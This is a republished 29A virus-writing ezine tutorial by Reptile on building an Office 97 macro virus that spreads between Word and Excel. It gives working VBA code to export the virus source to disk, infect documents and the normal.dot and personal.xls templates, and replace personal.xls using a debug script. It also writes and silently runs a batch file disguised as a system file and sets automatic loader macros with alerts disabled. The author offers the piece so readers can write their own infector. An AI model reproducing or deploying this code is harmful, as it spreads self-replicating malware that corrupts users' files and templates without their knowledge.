Copy Link
Add to Bookmark
Report

29A Issue 03 02 07

eZine's profile picture
Published in 
29A
 · 4 years ago

  

Cross Infection Tutorial for Office'97 PART I
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ>
Reptile/29A

Intro
ÄÄÄÄÄ
When I started working on Office Cross Infections I had no idea how to jump
from Word to Excel and vice versa. So I first began to research a bit on the
OLE2 format but realized that it's very complex :P and can't be done in VBA
(Visual Basic for Applications - all office'97 programs are using this).
Then I tried to manage it with OLE Automation, but anyways this didn't work
coz you have to import sum libs manually. After more researching I found
sum info on DDE (Dynamic Data-Exchange). With DDE you can send data from
one application to an other. I managed it to import code from word into
excel using DDE and the SendKeys command. But this was way too suspicious
becoz the user could see it very well. (VicodinES, Alt-F11 and me are shari-
ng macro ideas/code since the beginning of the word/excel infecting idea...
so all the cross infectors known till now could be seen as the success of
our teamwork. Now Alt-F11 finally managed to write a less suspicious DDE
macro virus by using DDE entries, gewd work man! ;)

Becoz of time pressure (mgl also wanted to be first :) I was switching from
the DDE stuff to an idea I had while lying stoned to death in my bed after
reading about the kewl import/export method - thanx again vic! The virus
exports it's source to the harddisk and then dr0ps a global template
(normal.dot for word and personal.xls for excel) that works as loader and
imports the virus source again in the other application.

DDE vs. Strange Days method
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
To build your own opinion I'd recommend to first take a l00k at the strange
days source (dr0pping a global template) and the shiver source (DDE) which
are included in this issue.

Well, the main disadvantage of the strange days way is that the virus be-
comes extremely huge. The problem that it needs debug.exe to spread isn't
a real problem at all coz everyone (even NT users) got it anyways.

On the other side the sucking thingy on DDE is that you have to start the
other application before opening a channel and then you need to use the
SendKeys command to force word to import the virus. At this moment word
popps up of it's minimized state for a short moment and is noticeable/sus-
picious.

Anyways don't forget to read more about DDE in the part II of the cross
infection tuto (DDE could also be interesting for other viruses)!

Basic Concept
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
Here I'll try to give an overview how an infected doc file gets processed
and jumps to excel (excel to word works the same way - just vice versa)

Word: * c:\ * Excel:
* *
* ÚÄÄÄÄÄÄÄÄÄ¿ *
1.) export virus * ³ Lo.sys: ³ 4.) The next time excel is
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ+³ virus ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» started per-
³ source to c:\ * ³ source ³ * º sonal.xls
³ * ÀÄÄÄÄÄÄÄÄÄÙ * + will import
ÚÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄ¿ 3.) drop the loader ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ INFECTED DOC FILE: ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ+³ uninfected Personal.xls: ³
³ virus source + loader ³ * * ³ loader ³
ÀÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÙ * * ÀÄÄÄÄÄÄÄÄÄÄÄÄÒÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
2.) infect ³ normal.dot * * º Lo.sys!
+ * * +
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ * * ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Infected normal.dot: ³ * * ³ *Infected* personal.xls: ³
³ virus source + loader ³ * * ³ virus source + loader ³
ÀÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÙ * * ÀÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
infect more³ doc files * * +
³ * * here the whole tale begins
+ * * again..

Detailed Information
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In this section the theory will get practised and the important stuff is
explained step by step (word to excel only coz excel to word is the same
thing again, just vice versa).

First you have to export the virus source code, so the loader will be l8r
able to import it to excel.

Application.VBE.ActiveVBProject.VBComponents("StrangeDays").Export "c:\lo
.sys"

Ok, now you have to check if you are in word or excel. This can simply
be done this way coz in excel there will never be an active document.

If ActiveDocument = "" Then GoTo teonanacatl

Then check if normal.dot and the active document are infected.

For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "StrangeDays" Then r =
True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "StrangeDays" Then e =
True
Next i

If they're still clean you should infect them by using the standard import/
export infection technique to avoid the sr-2 protection.

If e = False Then
With ActiveDocument.VBProject
With .VBComponents.Import("c:\lo.sys")
End With
End With
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFo
rmatDocument
End If
If r = False Then
With NormalTemplate.VBProject
With .VBComponents.Import("c:\lo.sys")
End With
End With
End If

Now you have to check if excel already is infected. This can be done in
various ways, for example marking it in a file (like here) or in the
registry.

a = GetPrivateProfileStringA("29A", "Magic", "", b, 255, "c:\lo.idx")
If b = "666" Then GoTo godsucks

After you're sure that excel is not infected yet, you must use api calls
to access the registry and get the full path of excel.

u = RegQueryValueExA(k, "Path", 0, REG_SZ, ByVal v$, s)
u = RegCloseKey(k)
For e = 1 To Len(v$)
If Mid$(v$, e, 1) = Chr$(0) Then GoTo lizard
h$ = h$ + Mid$(v$, e, 1)
Next e
lizard:

Ok, now you got the path of the original personal.xls which you have to
delete and replace it with the corrupted one that imports the virus source.

p = h$ + "\xlstart\personal.xls"
DeleteFileA (p)
Open "c:\a.scr" For Output As 1
Print #1, "N PERSONAL.XLS"
Print #1, "E 0100 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00"
Print #1, "E 0110 00 00 00 00 00 00 00 [...]
Close 1

This is how the code of the personal.xls-loader looks:
===========================================================================
Module name: syaDegnartS (Macro)
---------------------------------------------------------------------------
Attribute VB_Name = "syaDegnartS"
Sub Auto_Close()
On Error GoTo argh
Application.DisplayAlerts = False
Application.EnableCancelKey = xlDisabled

For i = 1 To Workbooks("personal.xls").VBProject.VBComponents.Count
If Workbooks("personal.xls").VBProject.VBComponents(i).Name = "StrangeDays"
Then GoTo argh
Next i

With Workbooks("personal.xls").VBProject
With .VBComponents.Import("c:\lo.sys")
End With
End With

Workbooks("personal.xls").Save
argh:
End Sub
===========================================================================

The code of the normal.dot-loader l00ks a bit diffrent but does the same:
===========================================================================
Module name: syaDegnartS (Macro)
---------------------------------------------------------------------------
Attribute VB_Name = "syaDegnartS"
Sub AutoExec()
On Error GoTo argh
Application.DisplayAlerts = False
Application.EnableCancelKey = wdDisabled

For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "StrangeDays" Then GoTo
argh
Next i

With NormalTemplate.VBProject
With .VBComponents.Import("c:\lo.sys")
End With
End With

NormalTemplate.Save
argh:
End Sub
===========================================================================

Then you have to build a batch file that converts the debug script of
normal.dot and copies it to the word template path and deletes all the
other files, that you don't need anymore.

Open "c:\start.bat" For Output As 1
Print #1, "REM This is a system file. Do not edit or remove!"
Print #1, "@echo off"
Print #1, "c:"
Print #1, "cd\"
Print #1, "dir"
Print #1, "debug < a.scr > nul"
Print #1, "copy personal.xls " + p
Print #1, "del a.scr"
Print #1, "del personal.xls"
Close 1
Shell "c:\start.bat", vbHide

To finish the whole process mark excel as infected.

c = WritePrivateProfileStringA("29A", "Magic", "666", "c:\lo.idx")

Diffrent AutoMacros
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In word and excel the automacros are diffrent so don't forget to add an
excel automacro that references to the word automacro else it won't be
run.

For example this macro (and with it the virus code) is executed automatic-
ally by word every time a file gets closed.

Sub AutoClose()
(virus code)
End Sub

While this macro is launched by excel every time a file gets opened. It then
just calls the macro above (containing the virus code).

Sub Auto_Open()
Application.OnSheetActivate = "StrangeDays.AutoClose"
End Sub

Cross Infector Info
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Cross: http://www.avp.ch/avpve/macro/xmulti/cross.stm
Strange Days: http://www.avp.ch/avpve/macro/xmulti/teocatl.stm
Shiver: http://www.avp.ch/avpve/macro/xmulti/SHIVER.stm

Well I guess this is enough information for writing an own cross infex0r
if I didn't forget too much details in my speedy rush..

see yah in hell,
-Reptile/29A-

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT